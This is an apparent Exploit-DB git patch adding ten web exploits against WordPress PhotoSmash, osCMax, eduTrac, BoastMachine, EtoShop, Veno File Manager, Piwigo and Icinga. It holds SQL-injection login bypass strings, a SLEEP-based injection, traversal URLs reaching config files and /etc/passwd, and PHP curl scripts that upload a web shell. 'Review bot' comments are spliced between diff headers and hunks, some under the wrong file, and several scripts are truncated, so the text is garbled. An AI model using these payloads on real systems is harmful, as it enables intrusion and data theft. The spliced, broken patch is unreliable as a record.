From 04598bf305d9f456cc9a3371a6b6decd76945845 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 7 Dec 2015 05:03:07 +0000
Subject: [PATCH] DB: 2015-12-07 10 new exploits
---
 files.csv | 10 ++++++++++
 platforms/asp/webapps/38879.txt | 12 ++++++++++++
 platforms/cgi/webapps/38882.txt | 7 +++++++
 platforms/php/webapps/38872.php | 19 +++++++++++++++++++
 platforms/php/webapps/38873.txt | 9 +++++++++
 platforms/php/webapps/38874.txt | 9 +++++++++
 platforms/php/webapps/38875.php | 28 ++++++++++++++++++++++++++++
 platforms/php/webapps/38876.txt | 9 +++++++++
 platforms/php/webapps/38877.txt | 12 ++++++++++++
 platforms/php/webapps/38880.txt | 7 +++++++
 platforms/php/webapps/38881.html | 25 +++++++++++++++++++++++++
 11 files changed, 147 insertions(+)
 create mode 100755 platforms/asp/webapps/38879.txt
 create mode 100755 platforms/cgi/webapps/38882.txt
 create mode 100755 platforms/php/webapps/38872.php
 create mode 100755 platforms/php/webapps/38873.txt
 create mode 100755 platforms/php/webapps/38874.txt
 create mode 100755 platforms/php/webapps/38875.php
 create mode 100755 platforms/php/webapps/38876.txt
 create mode 100755 platforms/php/webapps/38877.txt
 create mode 100755 platforms/php/webapps/38880.txt
 create mode 100755 platforms/php/webapps/38881.html
diff --git a/files.csv b/files.csv
index c27dc4f57..d7b5aa947 100755
--- a/files.csv
+++ b/files.csv
@@ -35137,3 +35137,13 @@ id,file,description,date,author,platform,type,port
 38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0
 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
+38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0
+38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0
+38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0
+38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0
+38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0
+38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0
+38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0
+38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
+38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
+38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function 
Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
diff --git a/platforms/asp/webapps/38879.txt b/platforms/asp/webapps/38879.txt
new file mode 100755
index 000000000..d7e8e5cab
--- /dev/null
+++ b/platforms/asp/webapps/38879.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64332/info
+
+B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vulnerable.
+
+www.example.com/demo/B2BVerticalMarketplace/admin.asp
+
+UserID : 1' or '1' = '1
+Password : 1' or '1' = '1
\ No newline at end of file
diff --git a/platforms/cgi/webapps/38882.txt b/platforms/cgi/webapps/38882.txt
new file mode 100755
index 000000000..fbaeb0c2d
--- /dev/null
+++ b/platforms/cgi/webapps/38882.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64363/info
+
+Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition.
+
+Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users.
+
+http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times]
\ No newline at end of file
diff --git a/platforms/php/webapps/38872.php b/platforms/php/webapps/38872.php
new file mode 100755
index 000000000..733e5894b
--- /dev/null
+++ b/platforms/php/webapps/38872.php
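Review bot: Rows 38876 and 38877 are filed as `php` under `platforms/php/webapps/` although their own descriptions name ASP endpoints (`/auction/asp/list.asp`, `/auction/casp/admin.asp`), while 38879, the same author's entry for the same vendor's `admin.asp`, is filed under `platforms/asp/webapps/` as `asp`. Platform misfiling makes the index unreliable for anyone filtering advisories by stack during triage; both rows should carry `asp` as platform, with the files relocated to match. Row 38874 also misspells `Vulnerablity` in its description. The 38882 row's description is split across two physical lines as rendered here; if the committed CSV field really contains a line break, the row will not parse as one record, which is worth checking.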
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/64173/info
+
+The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/38873.txt b/platforms/php/webapps/38873.txt
new file mode 100755
index 000000000..3937ab7ce
--- /dev/null
+++ b/platforms/php/webapps/38873.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64255/info
+
+eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+eduTrac 1.1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38874.txt b/platforms/php/webapps/38874.txt
new file mode 100755
index 000000000..5504b0861
--- /dev/null
+++ b/platforms/php/webapps/38874.txt
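Review bot: The advisory header never states which PhotoSmash Galleries version was tested, unlike the neighbouring 38873 and 38875 entries, so a defender reading this entry cannot tell whether an installed version is in scope; add a line after the second paragraph such as `PhotoSmash Galleries <tested version> is vulnerable; other versions may also be affected.` with the version filled in from the original report. The hunk header declares 19 added lines but only the tail of the script from `"@$uploadfile"));` onward is visible here, so the opening `<?php`, the target URL and the `CURLOPT_POSTFIELDS` setup cannot be reviewed from this page — most likely they were stripped as markup in rendering. The `"@$uploadfile"` form relies on the legacy `@file` upload convention for `CURLOPT_POSTFIELDS`, deprecated since PHP 5.5 and disabled by default from 5.6, so the script as archived will not behave as its description claims on current PHP.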
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64278/info
+
+BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://example.com/user.php
+(POST - blog)
+blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
\ No newline at end of file
diff --git a/platforms/php/webapps/38875.php b/platforms/php/webapps/38875.php
new file mode 100755
index 000000000..034f3543a
--- /dev/null
+++ b/platforms/php/webapps/38875.php
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/64307/info
+
+osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability .
+
+Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks.
+
+osCMax 2.5.3 is vulnerable; other versions may also be affected.
+
+"; # U'r Sh3lL h3re !
+$path ="/temp/"; # Sh3lL Path
+#-----------------------------------------------------------------------------
+$ch = curl_init("http://www.example.com//oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+ array('Filedata'=>"@$shell",
+ 'uploadpath'=>"@$path"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+#-----------------------------------------------------------------------------
+?>
diff --git a/platforms/php/webapps/38876.txt b/platforms/php/webapps/38876.txt
new file mode 100755
index 000000000..8337f0784
--- /dev/null
+++ b/platforms/php/webapps/38876.txt
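Review bot: `$headers` is passed to `CURLOPT_HTTPHEADER` but is not assigned on any line visible in this hunk; if it was set in the opening part of the script that this rendering lost (the `+1,28` count implies more lines than are shown, from `<?php` through the shell string), fine, otherwise it is an undefined variable and PHP will warn at run time. The `curl_init` URL reads `http://www.example.com//oxmax/admin/...` with a doubled slash and what looks like a misspelled install directory for osCMax, so the path prefix should be checked against the original report; the component path `admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php` is what defenders will match on in access logs and deserves to be stated once, accurately. The `@` upload prefix is applied to both POST fields, including the plain `uploadpath` string, and that convention has been deprecated since PHP 5.5, so the request the script actually sends on current PHP does not match what the inline comments suggest.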
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64329/info
+
+EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable.
+
+http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION]
\ No newline at end of file
diff --git a/platforms/php/webapps/38877.txt b/platforms/php/webapps/38877.txt
new file mode 100755
index 000000000..078a584a8
--- /dev/null
+++ b/platforms/php/webapps/38877.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64329/info
+
+EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable.
+
+www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp
+
+UserID : x' or ' 1=1--
+Password : x' or ' 1=1--
\ No newline at end of file
diff --git a/platforms/php/webapps/38880.txt b/platforms/php/webapps/38880.txt
new file mode 100755
index 000000000..d97eb15dd
--- /dev/null
+++ b/platforms/php/webapps/38880.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64346/info
+
+Veno File Manager is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
+
+http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
\ No newline at end of file
diff --git a/platforms/php/webapps/38881.html b/platforms/php/webapps/38881.html
new file mode 100755
index 000000000..d4641df3f
--- /dev/null
+++ b/platforms/php/webapps/38881.html
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/64357/info
+
+Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible.
+
+Piwigo 2.5.3 is vulnerable; other versions may also be affected.
+
+
+POC
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
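Review bot: The file carries an `.html` extension, yet the `source:` line, the three advisory paragraphs and the `POC` label are bare text outside any element, so the page is not well-formed and the advisory text renders as document content; wrap that header in an HTML comment (`<!-- source: ... -->` through the version line) and keep only the PoC markup as the body. Of the 25 lines the hunk header declares, only those text lines survive here and every other added line is empty as rendered, so the form markup the PoC submits — and whether it demonstrates the HTML-injection claim in the description as well as the CSRF — cannot be reviewed from this page.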